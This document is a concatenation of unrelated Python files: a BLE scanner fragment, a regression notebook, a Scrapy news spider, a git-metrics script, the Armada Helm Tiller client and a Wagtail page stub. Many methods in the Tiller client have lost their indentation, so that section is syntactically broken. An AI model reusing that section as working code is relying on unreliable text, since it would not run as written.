    # Scan for BLE advertisements on adapter hci0 for 2 seconds and return
    # the discovered {address: name} mapping.
    service = DiscoveryService('hci0')
    return service.discover(2)
def list():
    """Print every discoverable BLE device and its GATT characteristics.

    NOTE(review): the name intentionally stays `list` (shadowing the
    builtin) because the __main__ block calls it under this name.
    """
    devices = get_devices()
    print("Devices")
    for address, name in devices.items():
        print("  name: {}, address: {}".format(name, address))
        try:
            req = GATTRequester(address, False)
            req.connect(True, channel_type = 'random', security_level = 'medium')
            chars = req.discover_characteristics()
            for char in chars:
                print(char)
            req.disconnect()
        # BUG FIX (portability): `except X, e` is Python-2-only syntax;
        # the `as` form works on Python 2.6+ and Python 3.
        except RuntimeError as ex:
            print(str(ex))
def get_device(name):
    """Return the (address, name) pairs of discovered devices whose
    advertised name equals *name*."""
    found = []
    for address, dev_name in get_devices().items():
        if dev_name == name:
            found.append((address, dev_name))
    return found
if __name__ == '__main__':
    args = parse_args()
    logging.basicConfig()
    logging.getLogger('bluetooth').setLevel(logging.DEBUG)
    # -l / --list: just enumerate devices and exit.
    if args.list is True:
        list()
        sys.exit(0)
    # Resolve a device name to a MAC address when no MAC was given.
    if args.mac is None and args.name is not None:
        dev = get_device(args.name)
        if len(dev) == 0:
            # BUG FIX: the original `print(sys.stderr, "...")` printed the
            # file object to stdout; `file=` routes the message to stderr
            # (valid here because the module imports print_function).
            print("No matching devices found.", file=sys.stderr)
            sys.exit(1)
        if len(dev) > 1:
            print("Multiple matching devices found.")
            sys.exit(1)
        args.mac = dev[0][0]
    # Bridge the PTY and the BLE device until disconnect.
    if args.mac is not None:
        master = Master(args.mac)
        master.run()
|
# --------------
import pandas as pd
import numpy as np
# BUG FIX: sklearn.cross_validation was deprecated in 0.18 and removed in
# 0.20; train_test_split lives in sklearn.model_selection.
from sklearn.model_selection import train_test_split

# code starts here
# NOTE(review): `path` is expected to be injected by the execution
# environment (notebook platform variable) — confirm before running.
df = pd.read_csv(path)
df.head(5)

# Features: every column except `list_price` (column index 1).
X = df.iloc[:, [0, 2, 3, 4, 5, 6, 7, 8, 9]]
# Target: `list_price`.
y = df.iloc[:, 1]
print(X)
# 70/30 split with a fixed seed for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=6)
# code ends here
# --------------
import matplotlib.pyplot as plt

# code starts here
cols = X_train.columns
fig, axes = plt.subplots(3, 3)
for i in range(3):
    # BUG FIX: the inner loop was `range(3, 0)`, which is empty, so nothing
    # inside it ever ran; `col` was computed but never plotted.
    for j in range(3):
        col = cols[i * 3 + j]
        # One scatter per feature against the target, each on its own axis.
        axes[i][j].scatter(df['list_price'], df[col])
        axes[i][j].set_title(col)
# code ends here
# --------------
# Code starts here
# Inspect pairwise correlations between the training features.
corr = X_train.corr()
print(corr)
# Drop the same two columns from both splits so their schemas stay identical.
for split in (X_train, X_test):
    split.drop(['play_star_rating', 'val_star_rating'], axis=1, inplace=True)
# Code ends here
# --------------
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score

# Code starts here
# Ordinary least-squares fit on the training split, scored on the test split.
regressor = LinearRegression()
regressor.fit(X_train, y_train)
y_pred = regressor.predict(X_test)
mse = mean_squared_error(y_test, y_pred)  # symmetric in its two arguments
r2 = r2_score(y_test, y_pred)
print(mse, r2)
# Code ends here
# --------------
# Code starts here
# Residuals on the held-out split; a roughly symmetric histogram centred on
# zero is consistent with an unbiased linear fit.
residual = (y_test - y_pred)
plt.hist(residual, bins = 20)
# a = y_test.shape
# b = y_pred.shape
# print(a,b)
# Code ends here
|
import scrapy
from ..items import NewsScrapeItem
import re
class NationSpider(scrapy.Spider):
    """Spider that scrapes the latest articles from nationtv.tv."""

    name = "nation"

    def start_requests(self):
        """Seed the crawl with the 'latest content' listing page."""
        urls = ['https://www.nationtv.tv/main/content/latest/']
        for url in urls:
            yield scrapy.Request(url=url, callback=self.parse)

    def parse(self, response):
        """Extract article links from the listing page and follow them."""
        all_div = response.css('.mb-4')
        for i in all_div:
            url = i.xpath("div/div/div/a/@href").extract_first()
            # BUG FIX: extract_first() returns None when the selector does
            # not match, and scrapy.Request(url=None) raises, killing the
            # crawl. Skip cards without a link.
            if url:
                yield scrapy.Request(url=url, callback=self.parse_news)

    def parse_news(self, response):
        """Extract one article's fields into a NewsScrapeItem."""
        items = NewsScrapeItem()
        items['date'] = response.css('.article-date::text').extract_first()
        items['head'] = response.css('.article-title::text').extract_first()
        items['img'] = response.css('.article-feature-image img::attr(src)').extract_first()
        items['category'] = response.css('.breadcrumb-item:nth-child(3) a::text').extract_first()
        paragraphs = response.css('.article-body p::text').extract()
        # Single join instead of += in a loop (same output: each paragraph
        # followed by a newline).
        items['body'] = ''.join(p + '\n' for p in paragraphs)
        yield items
#%% |
#!/usr/bin/env python3.6
# example usage: ./2_1_per_module_metrics.py
import numpy as np
import os, json, time, re, subprocess
def is_cpp_file(file_name):
    """Return True when *file_name* ends in a C/C++ source or header extension."""
    extension = file_name.rsplit(".", 1)[-1]
    return extension in ("h", "cpp", "hpp", "c")
def transform_file_paths(output, lookup):
    """Normalise git-log file paths to relative paths known to *lookup*.

    Lines containing '#' (commit marker lines) pass through untouched, as do
    paths whose relative form is not a key of *lookup*.
    """
    transformed = []
    for entry in output:
        if "#" in entry:
            transformed.append(entry)
            continue
        relative = os.path.relpath(entry)
        transformed.append(relative if relative in lookup else entry)
    return transformed
# Map of relative file path -> [MTBC, NoC, BF, OSpLoC, SoVkC].
file_metrics = {}
# NOTE(review): file_path_start is written every iteration but never read
# again in this script.
file_path_start = ""
for root, dirs, files in os.walk("."):
    file_path_start = root[:2]
    for name in files:
        if is_cpp_file(name):
            # we set default values for the 5 metrics
            # MTBC : 365 => Biggest possible interval in our timeframe, since our observed time is one year
            # NoC : 0 => No commits = No authors
            # BF : 0 => 0 / 365 = 0
            # OSpLoC : 0 => No object file => 0 Bytes / LoC = 0
            # SoVkC : 0 => No symbols found that start with vk
            file_metrics[os.path.relpath(os.path.join(root,name))] = [365, 0, 0, 0, 0]
# Mean Time Between Changes
# We assume a MTBC for Files with only one change during our timeframe from the date of the commit to the current date
# We also assume a MTBC for Files with no commits of our max interval of 1 year
# git log output alternates '#<unix-timestamp>' marker lines with the file
# paths touched by that commit (newest commit first).
history = subprocess.run(["git", "log", "--format=#%ct", "--name-only", "--since=1 year ago "], stdout=subprocess.PIPE)
history = history.stdout.decode('UTF8').split("\n")
output = list(filter(lambda x: is_cpp_file(x) or '#' in x, history))
output = transform_file_paths(output, file_metrics)
# file path -> list of commit timestamps, newest first (git log order).
timestamp_dict ={}
current_time = 0
for line in output:
    if line[0] == "#":
        current_time = int(line[1:])
    else:
        timestamp_dict.setdefault(line, []).append(current_time)
for files, timestamps in timestamp_dict.items():
    if len(timestamps) > 1:
        differences = []
        for t_index in range(len(timestamps) - 1):
            # newest-first ordering makes each difference non-negative
            diff = timestamps[t_index] - timestamps[t_index + 1]
            differences.append(diff)
        # mean difference converted from seconds to whole days
        file_metrics[files][0] = int(np.mean(differences) / 60 / 60 / 24)
    else:
        # if file only was changed once we assume MTCB to be the difference between today and the one given date
        file_metrics[files][0] = int((time.time() - timestamps[0]) / 60 / 60 / 24)
# NUMBER OF AUTHORS
# Same parsing scheme as the MTBC section, but '#' marker lines now carry
# the author email (%ae) instead of a timestamp.
history = subprocess.run(["git", "log", "--format=#%ae", "--name-only", "--since=1 year ago "], stdout=subprocess.PIPE)
history = history.stdout.decode('UTF8').split("\n")
output = list(filter(lambda x: is_cpp_file(x) or '#' in x, history))
output = transform_file_paths(output, file_metrics)
# file path -> set of distinct author emails that touched it.
author_dict = {}
current_author = ''
for line in output:
    if line[0] == "#":
        current_author = line[1:]
    else:
        author_dict.setdefault(line, set()).add(current_author)
for file, authors in author_dict.items():
    file_metrics[file][1] = len(authors)
# BOTCH FACTOR: (number of commits)^2 divided by mean time between changes.
for path, metric_row in file_metrics.items():
    mtbc, noc = metric_row[0], metric_row[1]
    if mtbc != 0:
        # metric_row aliases the stored list, so this mutates file_metrics.
        metric_row[2] = noc ** 2 / mtbc
# Object Size per LoC (bytes of object file per source line)
with open('./compile_commands.json') as json_file:
    file_mapping = json.load(json_file)
for compile_entry in file_mapping:
    working_directory = compile_entry['directory']
    source_file_name = compile_entry['file']
    # Count lines without materialising the whole file in memory.
    with open(source_file_name) as source_file:
        source_file_line_count = sum(1 for _ in source_file)
    # NOTE(review): assumes every compile command contains exactly one
    # '-o <object>' pair — confirm for this build setup.
    object_file_name = compile_entry['command'].split('-o ')[1].split(' ')[0]
    object_file_size = os.path.getsize(os.path.join(working_directory, object_file_name))
    # BUG FIX: an empty source file previously raised ZeroDivisionError;
    # keep the default metric value (0) in that case.
    if source_file_line_count > 0:
        file_metrics[os.path.relpath(source_file_name)][3] = object_file_size / source_file_line_count
# Share of Vulkan Code
# BUG FIX: the pattern was the non-raw string '[\w_]+', which triggers an
# invalid-escape DeprecationWarning on Python 3.6+; \w already matches the
# underscore, so the explicit '_' was redundant as well.
pattern = re.compile(r'\w+')
for file in file_metrics:
    with open(file, 'r', encoding='utf-8', errors='replace') as source_file:
        # We assume that 'This check is case-insensitive and
        # counts every occurrence of a symbol per source code file'
        # means total number of symbols, not the total number of unique symbols
        total_symbols = []
        for line in source_file:
            total_symbols.extend(pattern.findall(line.lower()))
        # startswith('vk') implies length >= 2, so no separate length check
        # is needed.
        vk_symbols = sum(1 for symbol in total_symbols if symbol.startswith('vk'))
        if total_symbols:
            file_metrics[file][4] = vk_symbols / len(total_symbols)
# Visualization: one semicolon-separated line per file, preceded by a header.
print('# filename;MTBC;NoC;BF;OSpLoC;SoVkC')
for filename, metrics in file_metrics.items():
    rounded = (str(round(value, 2)) for value in metrics)
    print(filename + ';' + ";".join(rounded))
|
# Copyright 2017 The Armada Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import grpc
import yaml
from hapi.chart.config_pb2 import Config
from hapi.services.tiller_pb2 import GetReleaseContentRequest
from hapi.services.tiller_pb2 import GetReleaseStatusRequest
from hapi.services.tiller_pb2 import GetVersionRequest
from hapi.services.tiller_pb2 import InstallReleaseRequest
from hapi.services.tiller_pb2 import ListReleasesRequest
from hapi.services.tiller_pb2_grpc import ReleaseServiceStub
from hapi.services.tiller_pb2 import RollbackReleaseRequest
from hapi.services.tiller_pb2 import TestReleaseRequest
from hapi.services.tiller_pb2 import UninstallReleaseRequest
from hapi.services.tiller_pb2 import UpdateReleaseRequest
from oslo_config import cfg
from oslo_log import log as logging
from armada import const
from armada.exceptions import tiller_exceptions as ex
from armada.handlers.k8s import K8s
from armada.handlers import test
from armada.utils.release import label_selectors
# Client version advertised to Tiller via the x-helm-api-client header.
TILLER_VERSION = b'2.10.0'
# Extra seconds added on top of per-request timeouts for gRPC overhead.
GRPC_EPSILON = 60
RELEASE_LIMIT = 128  # TODO(mark-burnett): There may be a better page size.
# the standard gRPC max message size is 4MB
# this expansion comes at a performance penalty
# but until proper paging is supported, we need
# to support a larger payload as the current
# limit is exhausted with just 10 releases
# NOTE(review): value reads like 2**32 // 10 (~410 MB); confirm it was not
# intended to be a different limit.
MAX_MESSAGE_LENGTH = 429496729
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class CommonEqualityMixin(object):
    """Mixin providing value equality based on type and __dict__ contents."""

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class TillerResult(CommonEqualityMixin):
    '''Object to hold Tiller results for Armada.'''

    def __init__(self, release, namespace, status, description, version):
        # Plain value holder; equality comes from CommonEqualityMixin.
        self.release = release
        self.namespace = namespace
        self.status = status
        self.description = description
        self.version = version
class Tiller(object):
'''
The Tiller class supports communication and requests to the Tiller Helm
service over gRPC
'''
    def __init__(self,
                 tiller_host=None,
                 tiller_port=None,
                 tiller_namespace=None,
                 dry_run=False):
        '''
        :param tiller_host: Tiller IP override; when None the pod IP is
            discovered via Kubernetes
        :param tiller_port: Tiller gRPC port; falls back to CONF.tiller_port
        :param tiller_namespace: namespace Tiller runs in; falls back to
            CONF.tiller_namespace
        :param dry_run: when True, mutating requests are sent with dry_run
            set so Tiller makes no actual changes
        '''
        self.tiller_host = tiller_host
        # NOTE(review): a falsy port (0) falls back to CONF — assumed intended.
        self.tiller_port = tiller_port or CONF.tiller_port
        self.tiller_namespace = tiller_namespace or CONF.tiller_namespace
        self.dry_run = dry_run
        # init k8s connectivity
        self.k8s = K8s()
        # init Tiller channel (may raise ChannelException)
        self.channel = self.get_channel()
        # init timeout for all requests
        # and assume eventually this will
        # be fed at runtime as an override
        self.timeout = const.DEFAULT_TILLER_TIMEOUT
        LOG.debug('Armada is using Tiller at: %s:%s, namespace=%s, timeout=%s',
                  self.tiller_host, self.tiller_port, self.tiller_namespace,
                  self.timeout)
    @property
    def metadata(self):
        '''
        Return Tiller metadata for requests
        '''
        # Helm requires the client version header on every gRPC call.
        return [(b'x-helm-api-client', TILLER_VERSION)]
def get_channel(self):
'''
Return a Tiller channel
'''
tiller_ip = self._get_tiller_ip()
tiller_port = self._get_tiller_port()
try:
LOG.debug(
'Tiller getting gRPC insecure channel at %s:%s '
'with options: [grpc.max_send_message_length=%s, '
'grpc.max_receive_message_length=%s]', tiller_ip, tiller_port,
MAX_MESSAGE_LENGTH, MAX_MESSAGE_LENGTH)
return grpc.insecure_channel(
'%s:%s' % (tiller_ip, tiller_port),
options=[('grpc.max_send_message_length', MAX_MESSAGE_LENGTH),
('grpc.max_receive_message_length',
MAX_MESSAGE_LENGTH)])
except Exception:
raise ex.ChannelException()
def _get_tiller_pod(self):
'''
Returns Tiller pod using the Tiller pod labels specified in the Armada
config
'''
pods = None
namespace = self._get_tiller_namespace()
pods = self.k8s.get_namespace_pod(namespace,
CONF.tiller_pod_labels).items
# No Tiller pods found
if not pods:
raise ex.TillerPodNotFoundException(CONF.tiller_pod_labels)
# Return first Tiller pod in running state
for pod in pods:
if pod.status.phase == 'Running':
LOG.debug('Found at least one Running Tiller pod.')
return pod
# No Tiller pod found in running state
raise ex.TillerPodNotRunningException()
def _get_tiller_ip(self):
'''
Returns the Tiller pod's IP address by searching all namespaces
'''
if self.tiller_host:
LOG.debug('Using Tiller host IP: %s', self.tiller_host)
return self.tiller_host
else:
pod = self._get_tiller_pod()
LOG.debug('Using Tiller pod IP: %s', pod.status.pod_ip)
return pod.status.pod_ip
    def _get_tiller_port(self):
        '''Stub method to support arbitrary ports in the future'''
        # Resolved in __init__ from the constructor argument or CONF.tiller_port.
        LOG.debug('Using Tiller host port: %s', self.tiller_port)
        return self.tiller_port
    def _get_tiller_namespace(self):
        # Resolved in __init__ from the constructor argument or
        # CONF.tiller_namespace.
        LOG.debug('Using Tiller namespace: %s', self.tiller_namespace)
        return self.tiller_namespace
def tiller_status(self):
'''
return if Tiller exist or not
'''
if self._get_tiller_ip():
LOG.debug('Getting Tiller Status: Tiller exists')
return True
LOG.debug('Getting Tiller Status: Tiller does not exist')
return False
    def list_releases(self):
        '''
        List Helm Releases

        :returns: flat list of Release protobufs in DEPLOYED or FAILED state,
            most recently released first
        '''
        # TODO(MarshM possibly combine list_releases() with list_charts()
        # since they do the same thing, grouping output differently
        releases = []
        stub = ReleaseServiceStub(self.channel)
        # TODO(mark-burnett): Since we're limiting page size, we need to
        # iterate through all the pages when collecting this list.
        # NOTE(MarshM): `Helm List` defaults to returning Deployed and Failed,
        # but this might not be a desirable ListReleasesRequest default.
        req = ListReleasesRequest(
            limit=RELEASE_LIMIT,
            status_codes=[const.STATUS_DEPLOYED, const.STATUS_FAILED],
            sort_by='LAST_RELEASED',
            sort_order='DESC')
        LOG.debug('Tiller ListReleases() with timeout=%s', self.timeout)
        release_list = stub.ListReleases(
            req, self.timeout, metadata=self.metadata)
        # ListReleases streams paged responses; flatten each page's releases.
        for y in release_list:
            # TODO(MarshM) this log is too noisy, fix later
            # LOG.debug('Found release: %s', y.releases
            releases.extend(y.releases)
        return releases
def get_chart_templates(self, template_name, name, release_name, namespace,
chart, disable_hooks, values):
# returns some info
LOG.info("Template( %s ) : %s ", template_name, name)
stub = ReleaseServiceStub(self.channel)
release_request = InstallReleaseRequest(
chart=chart,
dry_run=True,
values=values,
name=name,
namespace=namespace,
wait=False)
templates = stub.InstallRelease(
release_request, self.timeout, metadata=self.metadata)
for template in yaml.load_all(
getattr(templates.release, 'manifest', [])):
if template_name == template.get('metadata', None).get(
'name', None):
LOG.info(template_name)
return template
def _pre_update_actions(self, actions, release_name, namespace, chart,
disable_hooks, values, timeout):
'''
:param actions: array of items actions
:param namespace: name of pod for actions
'''
try:
for action in actions.get('update', []):
name = action.get('name')
LOG.info('Updating %s ', name)
action_type = action.get('type')
labels = action.get('labels')
self.rolling_upgrade_pod_deployment(
name, release_name, namespace, labels, action_type, chart,
disable_hooks, values, timeout)
except Exception:
LOG.warn("Pre: Could not update anything, please check yaml")
raise ex.PreUpdateJobDeleteException(name, namespace)
try:
for action in actions.get('delete', []):
name = action.get('name')
action_type = action.get('type')
labels = action.get('labels', None)
self.delete_resources(
release_name,
name,
action_type,
labels,
namespace,
timeout=timeout)
except Exception:
LOG.warn("PRE: Could not delete anything, please check yaml")
raise ex.PreUpdateJobDeleteException(name, namespace)
def list_charts(self):
'''
List Helm Charts from Latest Releases
Returns a list of tuples in the form:
(name, version, chart, values, status)
'''
LOG.debug('Getting known releases from Tiller...')
charts = []
for latest_release in self.list_releases():
try:
release = (latest_release.name, latest_release.version,
latest_release.chart, latest_release.config.raw,
latest_release.info.status.Code.Name(
latest_release.info.status.code))
charts.append(release)
LOG.debug('Found release %s, version %s, status: %s',
release[0], release[1], release[4])
except (AttributeError, IndexError) as e:
LOG.debug('%s while getting releases: %s, ex=%s',
e.__class__.__name__, latest_release, e)
continue
return charts
    def update_release(self,
                       chart,
                       release,
                       namespace,
                       pre_actions=None,
                       post_actions=None,
                       disable_hooks=False,
                       values=None,
                       wait=False,
                       timeout=None,
                       force=False,
                       recreate_pods=False):
        '''
        Update a Helm Release

        :param chart: chart protobuf to upgrade to
        :param release: name of the release to update
        :param namespace: namespace the release lives in
        :param pre_actions: optional dict of actions run before the update
        :param post_actions: currently unused in this method
        :param disable_hooks: skip chart hooks during the upgrade
        :param values: raw YAML string of override values, or None
        :param wait: ask Tiller to wait for resources to become ready
        :param timeout: seconds Tiller may spend on the upgrade
        :param force: force resource updates through delete/recreate
        :param recreate_pods: restart pods for the release
        :returns: TillerResult summarizing the upgraded release
        :raises ex.ReleaseException: when the gRPC update fails
        '''
        timeout = self._check_timeout(wait, timeout)
        LOG.info(
            'Helm update release%s: wait=%s, timeout=%s, force=%s, '
            'recreate_pods=%s', (' (dry run)' if self.dry_run else ''), wait,
            timeout, force, recreate_pods)
        if values is None:
            values = Config(raw='')
        else:
            values = Config(raw=values)
        self._pre_update_actions(pre_actions, release, namespace, chart,
                                 disable_hooks, values, timeout)
        update_msg = None
        # build release install request
        try:
            stub = ReleaseServiceStub(self.channel)
            release_request = UpdateReleaseRequest(
                chart=chart,
                dry_run=self.dry_run,
                disable_hooks=disable_hooks,
                values=values,
                name=release,
                wait=wait,
                timeout=timeout,
                force=force,
                recreate=recreate_pods)
            # gRPC deadline is padded so Tiller's own timeout fires first.
            update_msg = stub.UpdateRelease(
                release_request,
                timeout + GRPC_EPSILON,
                metadata=self.metadata)
        except Exception:
            LOG.exception('Error while updating release %s', release)
            status = self.get_release_status(release)
            raise ex.ReleaseException(release, status, 'Upgrade')
        tiller_result = TillerResult(
            update_msg.release.name, update_msg.release.namespace,
            update_msg.release.info.status.Code.Name(
                update_msg.release.info.status.code),
            update_msg.release.info.Description, update_msg.release.version)
        return tiller_result
    def install_release(self,
                        chart,
                        release,
                        namespace,
                        values=None,
                        wait=False,
                        timeout=None):
        '''
        Create a Helm Release

        :param chart: chart protobuf to install
        :param release: name for the new release
        :param namespace: namespace to install into
        :param values: raw YAML string of override values, or None
        :param wait: ask Tiller to wait for resources to become ready
        :param timeout: seconds Tiller may spend on the install
        :returns: TillerResult summarizing the installed release
        :raises ex.ReleaseException: when the gRPC install fails
        '''
        timeout = self._check_timeout(wait, timeout)
        LOG.info('Helm install release%s: wait=%s, timeout=%s',
                 (' (dry run)' if self.dry_run else ''), wait, timeout)
        if values is None:
            values = Config(raw='')
        else:
            values = Config(raw=values)
        # build release install request
        try:
            stub = ReleaseServiceStub(self.channel)
            release_request = InstallReleaseRequest(
                chart=chart,
                dry_run=self.dry_run,
                values=values,
                name=release,
                namespace=namespace,
                wait=wait,
                timeout=timeout)
            # gRPC deadline is padded so Tiller's own timeout fires first.
            install_msg = stub.InstallRelease(
                release_request,
                timeout + GRPC_EPSILON,
                metadata=self.metadata)
            tiller_result = TillerResult(
                install_msg.release.name, install_msg.release.namespace,
                install_msg.release.info.status.Code.Name(
                    install_msg.release.info.status.code),
                install_msg.release.info.Description,
                install_msg.release.version)
            return tiller_result
        except Exception:
            LOG.exception('Error while installing release %s', release)
            status = self.get_release_status(release)
            raise ex.ReleaseException(release, status, 'Install')
    def test_release(self,
                     release,
                     timeout=const.DEFAULT_TILLER_TIMEOUT,
                     cleanup=False):
        '''
        :param release: name of release to test
        :param timeout: runtime before exiting
        :param cleanup: removes testing pod created
        :returns: test suite run object
        :raises ex.ReleaseException: when running the tests fails
        '''
        LOG.info("Running Helm test: release=%s, timeout=%s", release, timeout)
        try:
            stub = ReleaseServiceStub(self.channel)
            # TODO: This timeout is redundant since we already have the grpc
            # timeout below, and it's actually used by tiller for individual
            # k8s operations not the overall request, should we:
            # 1. Remove this timeout
            # 2. Add `k8s_timeout=const.DEFAULT_K8S_TIMEOUT` arg and use
            release_request = TestReleaseRequest(
                name=release, timeout=timeout, cleanup=cleanup)
            # RunReleaseTest streams messages; failures are counted so the
            # summary can be logged after the stream completes.
            test_message_stream = stub.RunReleaseTest(
                release_request, timeout, metadata=self.metadata)
            failed = 0
            for test_message in test_message_stream:
                if test_message.status == test.TESTRUN_STATUS_FAILURE:
                    failed += 1
                LOG.info(test_message.msg)
            if failed:
                LOG.info('{} test(s) failed'.format(failed))
            status = self.get_release_status(release)
            return status.info.status.last_test_suite_run
        except Exception:
            LOG.exception('Error while testing release %s', release)
            status = self.get_release_status(release)
            raise ex.ReleaseException(release, status, 'Test')
    def get_release_status(self, release, version=0):
        '''
        :param release: name of release to test
        :param version: version of release status (0 selects the latest)
        :returns: GetReleaseStatus response protobuf
        :raises ex.GetReleaseStatusException: on any failure
        '''
        LOG.debug('Helm getting release status for release=%s, version=%s',
                  release, version)
        try:
            stub = ReleaseServiceStub(self.channel)
            status_request = GetReleaseStatusRequest(
                name=release, version=version)
            release_status = stub.GetReleaseStatus(
                status_request, self.timeout, metadata=self.metadata)
            LOG.debug('GetReleaseStatus= %s', release_status)
            return release_status
        except Exception:
            # Any gRPC failure is surfaced as the domain-specific exception.
            raise ex.GetReleaseStatusException(release, version)
    def get_release_content(self, release, version=0):
        '''
        :param release: name of release to test
        :param version: version of release status (0 selects the latest)
        :returns: GetReleaseContent response protobuf
        :raises ex.GetReleaseContentException: on any failure
        '''
        LOG.debug('Helm getting release content for release=%s, version=%s',
                  release, version)
        try:
            stub = ReleaseServiceStub(self.channel)
            status_request = GetReleaseContentRequest(
                name=release, version=version)
            release_content = stub.GetReleaseContent(
                status_request, self.timeout, metadata=self.metadata)
            LOG.debug('GetReleaseContent= %s', release_content)
            return release_content
        except Exception:
            # Any gRPC failure is surfaced as the domain-specific exception.
            raise ex.GetReleaseContentException(release, version)
def tiller_version(self):
'''
:returns: Tiller version
'''
try:
stub = ReleaseServiceStub(self.channel)
release_request = GetVersionRequest()
LOG.debug('Getting Tiller version, with timeout=%s', self.timeout)
tiller_version = stub.GetVersion(
release_request, self.timeout, metadata=self.metadata)
tiller_version = getattr(tiller_version.Version, 'sem_ver', None)
LOG.debug('Got Tiller version %s', tiller_version)
return tiller_version
except Exception:
LOG.debug('Failed to get Tiller version')
raise ex.TillerVersionException()
def uninstall_release(self, release, disable_hooks=False, purge=True):
'''
:param: release - Helm chart release name
:param: purge - deep delete of chart
Deletes a Helm chart from Tiller
'''
# Helm client calls ReleaseContent in Delete dry-run scenario
if self.dry_run:
content = self.get_release_content(release)
LOG.info(
'Skipping delete during `dry-run`, would have deleted '
'release=%s from namespace=%s.', content.release.name,
content.release.namespace)
return
# build release uninstall request
try:
stub = ReleaseServiceStub(self.channel)
LOG.info(
"Uninstall %s release with disable_hooks=%s, "
"purge=%s flags", release, disable_hooks, purge)
release_request = UninstallReleaseRequest(
name=release, disable_hooks=disable_hooks, purge=purge)
return stub.UninstallRelease(
release_request, self.timeout, metadata=self.metadata)
except Exception:
LOG.exception('Error while uninstalling release %s', release)
status = self.get_release_status(release)
raise ex.ReleaseException(release, status, 'Delete')
def delete_resources(self,
release_name,
resource_name,
resource_type,
resource_labels,
namespace,
wait=False,
timeout=const.DEFAULT_TILLER_TIMEOUT):
'''
:param release_name: release name the specified resource is under
:param resource_name: name of specific resource
:param resource_type: type of resource e.g. job, pod, etc.
:param resource_labels: labels by which to identify the resource
:param namespace: namespace of the resource
Apply deletion logic based on type of resource
'''
timeout = self._check_timeout(wait, timeout)
label_selector = ''
if resource_labels is not None:
label_selector = label_selectors(resource_labels)
LOG.debug(
"Deleting resources in namespace %s matching "
"selectors (%s).", namespace, label_selector)
handled = False
if resource_type == 'job':
get_jobs = self.k8s.get_namespace_job(namespace, label_selector)
for jb in get_jobs.items:
jb_name = jb.metadata.name
if self.dry_run:
LOG.info(
'Skipping delete job during `dry-run`, would '
'have deleted job %s in namespace=%s.', jb_name,
namespace)
continue
LOG.info("Deleting job %s in namespace: %s", jb_name,
namespace)
self.k8s.delete_job_action(jb_name, namespace, timeout=timeout)
handled = True
if resource_type == 'cronjob' or resource_type == 'job':
get_jobs = self.k8s.get_namespace_cron_job(namespace,
label_selector)
for jb in get_jobs.items:
jb_name = jb.metadata.name
if resource_type == 'job':
# TODO: Eventually disallow this, allowing initially since
# some existing clients were expecting this behavior.
LOG.warn("Deleting cronjobs via `type: job` is "
"deprecated, use `type: cronjob` instead")
if self.dry_run:
LOG.info(
'Skipping delete cronjob during `dry-run`, would '
'have deleted cronjob %s in namespace=%s.', jb_name,
namespace)
continue
LOG.info("Deleting cronjob %s in namespace: %s", jb_name,
namespace)
self.k8s.delete_cron_job_action(jb_name, namespace)
handled = True
if resource_type == 'pod':
release_pods = self.k8s.get_namespace_pod(namespace,
label_selector)
for pod in release_pods.items:
pod_name = pod.metadata.name
if self.dry_run:
LOG.info(
'Skipping delete pod during `dry-run`, would '
'have deleted pod %s in namespace=%s.', pod_name,
namespace)
continue
LOG.info("Deleting pod %s in namespace: %s", pod_name,
namespace)
self.k8s.delete_pod_action(pod_name, namespace)
if wait:
self.k8s.wait_for_pod_redeployment(pod_name, namespace)
handled = True
if not handled:
LOG.error("Unable to execute name: %s type: %s ", resource_name,
resource_type)
def rolling_upgrade_pod_deployment(self,
name,
release_name,
namespace,
resource_labels,
action_type,
chart,
disable_hooks,
values,
timeout=const.DEFAULT_TILLER_TIMEOUT):
'''
update statefullsets (daemon, stateful)
'''
if action_type == 'daemonset':
LOG.info('Updating: %s', action_type)
label_selector = ''
if resource_labels is not None:
label_selector = label_selectors(resource_labels)
get_daemonset = self.k8s.get_namespace_daemonset(
namespace=namespace, label=label_selector)
for ds in get_daemonset.items:
ds_name = ds.metadata.name
ds_labels = ds.metadata.labels
if ds_name == name:
LOG.info("Deleting %s : %s in %s", action_type, ds_name,
namespace)
self.k8s.delete_daemon_action(ds_name, namespace)
# update the daemonset yaml
template = self.get_chart_templates(
ds_name, name, release_name, namespace, chart,
disable_hooks, values)
template['metadata']['labels'] = ds_labels
template['spec']['template']['metadata'][
'labels'] = ds_labels
self.k8s.create_daemon_action(
namespace=namespace, template=template)
# delete pods
self.delete_resources(
release_name,
name,
'pod',
resource_labels,
namespace,
wait=True,
timeout=timeout)
else:
LOG.error("Unable to exectue name: % type: %s", name, action_type)
def rollback_release(self,
release_name,
version,
wait=False,
timeout=None,
force=False,
recreate_pods=False):
'''
Rollback a helm release.
'''
timeout = self._check_timeout(wait, timeout)
LOG.debug(
'Helm rollback%s of release=%s, version=%s, '
'wait=%s, timeout=%s', (' (dry run)' if self.dry_run else ''),
release_name, version, wait, timeout)
try:
stub = ReleaseServiceStub(self.channel)
rollback_request = RollbackReleaseRequest(
name=release_name,
version=version,
dry_run=self.dry_run,
wait=wait,
timeout=timeout,
force=force,
recreate=recreate_pods)
rollback_msg = stub.RollbackRelease(
rollback_request,
timeout + GRPC_EPSILON,
metadata=self.metadata)
LOG.debug('RollbackRelease= %s', rollback_msg)
return
except Exception:
raise ex.RollbackReleaseException(release_name, version)
def _check_timeout(self, wait, timeout):
if timeout is None or timeout <= 0:
if wait:
LOG.warn(
'Tiller timeout is invalid or unspecified, '
'using default %ss.', self.timeout)
timeout = self.timeout
return timeout
|
from django.db import models
from wagtail.core.models import Page
from wagtail.core.fields import RichTextField
from wagtail.admin.edit_handlers import FieldPanel
from wagtailmenus.models import MenuPage
from django.shortcuts import render
from django.core.mail import EmailMessage
from django.template.loader import get_template
import pandas as pd
import datetime
import eb_passwords
# import datetime
class Info(Page):
    """Event-info page for the autumn birding challenge, with links to the
    team-selection and prize pages."""

    info_content = RichTextField(blank=True, help_text='秋季觀鳥競賽的活動說明')
